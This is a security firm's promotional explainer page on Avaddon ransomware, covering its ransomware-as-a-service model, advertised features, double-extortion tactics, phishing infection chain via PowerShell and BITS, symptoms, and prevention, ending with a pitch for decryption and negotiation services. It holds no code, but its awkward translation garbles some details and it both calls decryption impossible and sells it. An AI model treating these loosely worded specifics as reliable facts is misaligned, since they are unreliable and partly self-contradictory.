+30 2106897383 info@tictaclabs.com

Avaddon Ransomware – Avaddon Decryptor

What is Avaddon Ransomware and the Avaddon Decryptor works

Avaddon Ransomware first appeared in June 2020 and has remained a prominent threat since then. It was present in Russian-speaking hacking forums as an offer of ransomware-as-a-service (RaaS).

In the video below we will show you how Avaddon decryptor and Avaddon Decryption process works

Both the Australian Cyber Security Centre (ACSC) and the FBI draw attention to cyber attacks by criminals that use the Avaddon ransomware. The FBI pointed out that Avaddon’s administrators had affected US and other foreign private companies, health services, airlines and construction companies. In addition, Avaddon ransomware hackers stole recent SIM card data and bank information in an attack on Schepisi Communications, a service provider in the the Australian telecommunications company Telstra.

To sum up, the Avaddon ransomware attacks with known tactics. However, attackers confirm that the victim is not coming from the Commonwealth of Independent States (CIS).

Avaddon Decryption Process

In the following steps you can see how Avaddon Decryptor works in order to decrypt your files.

There are some important steps before and after the Avaddon Decryption. This means you have to prepare your environment carefully and you need to plan before you run the Avaddon Decryptor.

First and Second Avaddon  Ransomware versions

Initially, Avaddon managers advertised their malware, highlighting the following features:

  • Unique payloads written in C++
  • Encrypt complete file & custom parameters
  • Encrypted files can’t be decrypted by a third party
  • IOCP support for parallel file encryption
  • Continuous encryption of new written files and newly connected media
  • Encryption of hidden files and volumes
  • Cryptovirus which has the ability to dissipate across network share (SMB, DFS) and which ceases any process that prevents encryption of files.
  • Avaddon also removes garbage, VSS and other recovery sites.

In particular, administrators stress that there is support for Windows 7 and higher but also that encryption is very powerful. In particular, they encrypt all local and remote drives.

2nd Avaddon version

In February 2021, a Spanish student named Javier Yuste gave a free Avaddon decryption tool for the free recovery of victims’ files. After that the cryptovirus administrators reacted immediately.

In particular, an update of the Avaddon code was released. In this way  the free decryptor was made ineffective for the second edition of Avaddon.

Ransom note and leakage blackmail

Avaddon Ransomware - Avaddon Decryptor

Similar to administrators of other ransomware, Avaddon administrators blackmail victims that they will publish their data on the dark web.

In particular, after first accessing a victim’s network, they leave a ransom note and at the same time  they warn of the possible leakage of data with a warning on Avaddon’s website on dark web. This warning message contains screenshots of files as proof of access to the victim’s network.

In particular, if the victim does not pay ransom directly in 3 to 5 days, the attackers intensify the pressure by leaking some 5% of the affected files in file format .zip on Avaddon website.

However, they may make the stolen files fully public if the victim does not pay the ransom, even after some of his files have been leaked.

Avaddon Ransomware profile and mode of operation

Avaddon Ransomware is a cryptolocker ransomware written in C++. When hackers invade the victim’s network, files change expansion and now display the new .avdn. extension.

Ransomware also deletes shadow volume copies and other system backups. A ransom note then asks for amounts that range from $150 to $900.

Additional threats

Considering that Avaddon ransomware uses strong encryption algorithms, there is no decryption tool available especially after its second version. In particular, Avaddon uses a hybrid encryption method similar to other modern Ransomware using AES256 and RSA2048 encryption keys. It is therefore impossible to decipher files without the key from attackers.

It is worth noting that Avaddon is promoted as Ransomware-as-a-service (RaaS) such as REvil. This means that even someone with a limited technical background can become a “partner” to spread malware.In return, the profit is shared between the manager and the intermediary.

Method of contamination

Initially, Avaddon hackers started their attacks via phishing messages. In particular, in this way they manage to lure the victims by sending a malicious attached file. In particular, the email contains an attached image called IMG < random-6 digits > .jpg.js. However, the attachment is actually a JavaScript file. Running this JavaScript file results in ransomware Avaddon being downloaded from an external C2 server through a combination of PowerShell and BITS management tool. Then, once the binary is run, connect to https://api.myip.com to get the outer IP address of the machine of the victim.

In 2021, Avaddon added additional leverage to make its victims pay using attacks DDoS.

Specific elements of Avaddon

  • Javascript-downloaders are quite simple and include the use of two embedded Microsoft, Powershell, and BITS tools to lower the payload ransomware from the C2 server and execute it by the victim.
  • The primary initial technique is the coded base strings 64.
  • After decryption, strings that contain orders (executed to delete shadow copies and backups) are revealed.
  • Avaddon itself has various anti-debugging techniques.

How do I have to act when my data has been encrypted by Avaddon?

If your files are infected with Avaddon:

  • You should disconnect your system from the network.
  • Disable the contaminated machine as Avaddon can continue encrypting your data backstage.
  • It would be good to avoid direct negotiation, as you may be the victim of further exploitation.
  • Avaddon uses such encryption that it makes it unlikely that any recovery effort will be made by quick correction.

Contact TicTac to negotiate with the attackers. We’re here through our experience to help you recover your encrypted files.

How do I understand that there is contamination of my system by Avaddon Ransomware?

If Avaddon has infected your system:

  • You will not have access to your files.
  • You will receive notice that the files have been encrypted. Indeed, Avaddon Ransomware leaves a text file called EXTENSION-readme.tt on your desktop, or even in any encrypted folder.
  • You will receive a ransom note from Avaddon managers. In particular, the attackers instruct you to visit a hidden service where they are trying to blackmail you.
  • Encrypted files display a random series of small and chapters of letters as an extension.
  • Also, it’s very likely that your screen wallpaper will change.In particular, a threatening message may appear.
  • Note that the CPU is used 100% even when there are no applications in use.
  • The machine you use works at a much slower speed than usual.
  • Your antiviral software is not working or Avaddon has already turned it off.

Prevention and protection against Avaddon

In order not to fall victim to Avaddon ransomware, it is recommended:

  • Storage of data on external discs, cloud and offline storage.
  • All e-mails should be scrutinised.
  • You should not open any website from unknown sources.
  • You must choose safety and security solutions such as fire walls, authorisations, web filtering and mail filtering.
  • Finally, it is important to use the identification of two factors with strong passwords, especially for distance access services.

In any case, you can contact TicTac if you fall victim to Avaddon Ransomware. Our skilled staff can help you manage such an attack.

Tictac will help you throughout the Avaddon Decryption process but also perform Legal and IT support in order for your organization to skip the business interruption as fast as possible.